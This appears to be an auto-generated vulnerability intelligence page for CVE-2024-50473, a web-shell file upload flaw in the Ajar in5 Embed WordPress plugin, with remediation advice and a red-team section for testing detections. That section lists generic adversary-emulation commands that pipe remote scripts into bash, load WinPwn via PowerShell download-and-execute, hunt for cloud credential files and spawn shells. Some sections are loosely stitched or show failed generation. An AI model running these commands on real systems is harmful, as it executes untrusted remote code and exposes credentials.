CVE-2024-50473
Overview
This vulnerability is an unrestricted file upload flaw classified under CWE-434, occurring in the Ajar Productions Ajar in5 Embed plugin. The root cause lies in insufficient validation of uploaded file types, allowing dangerous files such as web shells to be uploaded to the web server. The affected component is the file upload functionality within the plugin versions up to and including 3.1.3.
Vulnerability Description
Unrestricted Upload of File with Dangerous Type vulnerability in Ajar Productions Ajar in5 Embed ajar-productions-in5-embed allows Upload a Web Shell to a Web Server.This issue affects Ajar in5 Embed: from n/a through <= 3.1.3.
Impact
An unauthenticated attacker can upload and execute arbitrary code on the target web server by leveraging this vulnerability, resulting in full system compromise. This allows the attacker to execute commands, manipulate data, and potentially pivot within the network. The exploit requires no prior authentication or user interaction, making it highly accessible and dangerous. The business impact includes unauthorized access to sensitive information, data breaches, and disruption of service continuity.
Solution
Users of Ajar Productions Ajar in5 Embed should upgrade to versions later than 3.1.3 where this issue is resolved. The patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/ajar-productions-in5-embed/vulnerability/wordpress-ajar-in5-embed-plugin-3-1-3-arbitrary-file-upload-vulnerability) provides detailed instructions for remediation. Applying the vendor-supplied update eliminates the unrestricted file upload flaw by enforcing proper file type validation and upload restrictions.
EPSS vs KEV Prediction — Evolution (30 days)
Overview
Analysis generation failed
Threat Summary
Analysis generation failed
Full Analysis
The vulnerability associated with unrestricted file uploads in Ajar Productions' Ajar in5 Embed product presents a critical security risk due to the potential for malicious actors to upload web shells. This flaw allows attackers to bypass file type restrictions, enabling them to upload executable scripts disguised as benign files. The underlying issue stems from inadequate validation mechanisms that fail to properly assess the content and type of files being uploaded. As a result, an attacker can leverage this weakness to gain unauthorized access to the web server, execute arbitrary code, and manipulate server-side resources.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may craft a malicious file, such as a PHP or ASP script, and upload it to the server using the legitimate file upload functionality provided by the application. Once the web shell is successfully uploaded, the attacker can execute commands on the server, potentially leading to further exploitation of the system. This could include data exfiltration, lateral movement within the network, or even the deployment of additional malware. The ease of exploitation, combined with the potential for significant damage, underscores the urgency for organizations using this product to address the vulnerability promptly.
The real-world impact of this vulnerability can be severe, particularly for businesses that rely on the affected product for content management or web publishing. Successful exploitation could lead to data breaches, loss of sensitive information, and reputational damage. Furthermore, the financial implications of remediation efforts, legal liabilities, and potential regulatory fines can be substantial. Organizations may also face operational disruptions as they respond to incidents and restore affected systems. The high CVSS score of 10.0 reflects the critical nature of this vulnerability and the extensive risks it poses to businesses.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to conduct a thorough assessment of the current deployment of the affected product, identifying any instances where unrestricted file uploads are enabled. Regular security audits and penetration testing can help uncover potential weaknesses and validate the effectiveness of existing security measures. Additionally, organizations should enforce strict file type validation and implement a robust file upload policy that includes whitelisting acceptable file types and employing content scanning to detect malicious payloads.
Moreover, organizations should consider applying security patches and updates provided by the vendor as soon as they become available. In parallel, employing web application firewalls (WAFs) can help filter out malicious traffic and block attempts to exploit this vulnerability. Educating employees about the risks associated with file uploads and promoting secure coding practices can further enhance the organization's security posture. By taking these proactive steps, businesses can significantly reduce their exposure to the risks associated with this critical vulnerability and protect their assets from potential exploitation.
CSURFACE threat intelligence has detected the emergence of a public proof-of-concept exploit targeting CVE-2024-50473, significantly expanding the exploitation landscape for Ajar in5 Embed versions up to 3.1.3. This development has elevated the CVSS score to the maximum of 10.0, reflecting the critical nature of the vulnerability now actively weaponized. Our telemetry indicates a substantial increase in exploitability potential, as evidenced by the EPSS score rising to 0.615, placing it in the upper percentile for likely exploitation. The availability of unauthenticated arbitrary file upload exploits lowers the barrier for attackers, increasing the risk of web shell deployment and subsequent full server compromise. This shift marks a marked escalation in threat actor capabilities and intent, underscoring an urgent need for heightened vigilance. Consequently, the risk level associated with this vulnerability has intensified from theoretical to imminent, demanding immediate attention from defenders to monitor for exploitation attempts and adjust detection strategies accordingly.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
RandomRobbieBF/CVE-2024-50473
Ajar in5 Embed <= 3.1.3 - Unauthenticated Arbitrary File Upload
|
RandomRobbieBF | 0 | 0 | 2024-11-09 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50473 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/Wordpress/Plugin/ajar-productions-in5-embed/vulnerability/wordpress-ajar-in5-embed-plugin-3-1-3-arbitrary-file-upload-vulnerability?_s_id=cve |